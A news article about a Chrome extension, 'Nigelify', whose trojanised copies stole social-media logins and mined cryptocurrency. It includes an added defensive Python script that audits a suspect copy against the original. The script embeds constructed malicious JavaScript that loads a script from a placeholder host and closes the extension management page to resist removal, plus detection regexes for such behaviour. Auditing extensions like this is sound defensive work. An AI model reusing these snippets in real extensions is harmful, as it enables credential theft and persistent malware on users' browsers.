Chrome users should be careful about which extensions they install, as shown by the recent case of a malicious extension that harvested data and mined digital currencies.
How The Malware Spreads
On Thursday, May 10, cybersecurity company Radware revealed that its machine-learning algorithms recently encountered a zero-day malware that has been active since at least March 2018. More than 100,000 users in over 100 countries were infected by the malware.
The malware reportedly abused a Google Chrome extension called the "Nigelify" application, which replaced pictures online with the character of Nigel Thornberry from the 1990s animated television show The Wild Thornberrys. A malicious script was added to copies of the real extension in order to spread.
Victims were infected through socially engineered links on Facebook that redirected them to a fake YouTube page, which asked them to install the Chrome extension in order to play the video.
"This group appears to have been undetected until now thanks to the campaign consistently changing applications and the use of an evasive mechanism for spreading the malware," Radware wrote on its website.
Most of the infected users lived in the Philippines, Venezuela, and Ecuador.
What Does The Malware Do?
The malware victimized users by stealing personal data and by using their computers to mine cryptocurrency.
First, the malware executed JavaScript that added the computer to a botnet used to steal data. It primarily went after social media networks, specifically login information for Facebook and Instagram. From there, the malware used the stolen login information to send the malicious links to the victim's friends.
After stealing the data, the malware began mining cryptocurrency, using popular browser-mining software to mine digital currencies. The malware has reportedly collected $1,000 in cryptocurrencies, mostly Monero, in less than a week.
Some users became aware of the malware and attempted to remove the malicious extension. However, the malware was sophisticated enough to prevent the user from deleting it by closing.
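The article describes the pattern behind this campaign: a legitimate extension copied, an extra script bolted on, and self-protection against removal. A defender who suspects an installed extension is such a copy would compare it against the genuine version and scan only what the copy added. The script below is an added example written for this page, not code from Radware, Google, or the extension's author. The manifests, script sources and indicator list are constructed by me to illustrate the approach; the remote host is a placeholder and the indicators are my own heuristics, not a signature for any real extension.

```python
"""Audit a copy of a Chrome extension against the original it claims to be.

Added example for this article; the extension data below is constructed,
and the indicator list is a heuristic chosen to match the behaviour the
article reports (remote script loading, self-protection, credential access).
"""
import hashlib
import re

# Constructed: manifest of the genuine image-swapping extension.
ORIGINAL_MANIFEST = {
    "name": "Nigelify",
    "version": "1.0",
    "manifest_version": 2,
    "permissions": ["activeTab"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["swap_images.js"]}],
}

# Constructed: the same manifest with an extra content script, a background
# script and broader permissions, the shape of the copies the article describes.
COPY_MANIFEST = {
    "name": "Nigelify",
    "version": "1.0",
    "manifest_version": 2,
    "permissions": ["activeTab", "tabs", "cookies", "<all_urls>"],
    "background": {"scripts": ["background.js"]},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["swap_images.js", "helper.js"]}],
}

SWAP_IMAGES_JS = "document.querySelectorAll('img').forEach(i => { i.src = NIGEL_URL; });"

ORIGINAL_FILES = {"swap_images.js": SWAP_IMAGES_JS}

# Constructed sources for the copy; example.invalid is a placeholder host.
COPY_FILES = {
    "swap_images.js": SWAP_IMAGES_JS,
    "helper.js": (
        "var s = document.createElement('script');"
        "s.src = 'https://example.invalid/p.js';"
        "document.head.appendChild(s);"
    ),
    "background.js": (
        "chrome.tabs.onUpdated.addListener(function (id, info, tab) {"
        "  if (tab.url && tab.url.indexOf('chrome://extensions') === 0) chrome.tabs.remove(id);"
        "});"
    ),
}

# Heuristic indicators (my choice, not an official list).
INDICATORS = [
    (re.compile(r"""\.src\s*=\s*['"]https?://"""), "loads a script from a remote URL"),
    (re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("), "evaluates code at runtime"),
    (re.compile(r"chrome://extensions"), "references the extension management page"),
    (re.compile(r"chrome\.tabs\.remove\s*\("), "closes tabs programmatically"),
    (re.compile(r"document\.cookie|chrome\.cookies"), "reads browser cookies"),
]


def digest(source: str) -> str:
    return hashlib.sha256(source.encode()).hexdigest()


def changed_files(original_files: dict, copy_files: dict) -> list:
    """Files in the copy that are new or whose content differs from the original."""
    return sorted(
        name for name, src in copy_files.items()
        if name not in original_files or digest(original_files[name]) != digest(src)
    )


def added_permissions(original_manifest: dict, copy_manifest: dict) -> list:
    """Permissions the copy requests that the original did not."""
    original = set(original_manifest.get("permissions", []))
    return sorted(set(copy_manifest.get("permissions", [])) - original)


def scan_script(source: str) -> list:
    """Descriptions of every indicator that matches the script source."""
    return [desc for pattern, desc in INDICATORS if pattern.search(source)]


def audit_copy(original_manifest, original_files, copy_manifest, copy_files) -> dict:
    """Compare a copy against the original and scan only what the copy added.

    Scanning the delta matters: the genuine extension also runs on <all_urls>,
    so host-permission breadth alone would flag both versions equally.
    """
    changed = changed_files(original_files, copy_files)
    findings = {name: scan_script(copy_files[name]) for name in changed}
    return {
        "new_permissions": added_permissions(original_manifest, copy_manifest),
        "changed_files": changed,
        "findings": {name: hits for name, hits in findings.items() if hits},
    }


if __name__ == "__main__":
    report = audit_copy(ORIGINAL_MANIFEST, ORIGINAL_FILES, COPY_MANIFEST, COPY_FILES)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against the constructed data, the unchanged swap_images.js produces no findings, while the two added files are flagged for remote script loading and for closing the extension management page, which is the kind of evidence that separates a trojanised copy from the benign original it imitates.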
Google Responds To The Malware
Once Google learned about the malware, it removed the extension. The company also removed four other similar extensions on the same day.
"We removed the malicious extensions from Chrome Web Store and the browsers of the small percentage of affected users within hours of being alerted," a Google spokesperson told Threatpost.
This is not the first such incident for Chrome users. A few months ago, Google had to shut down a series of malicious extensions that infected 500,000 users.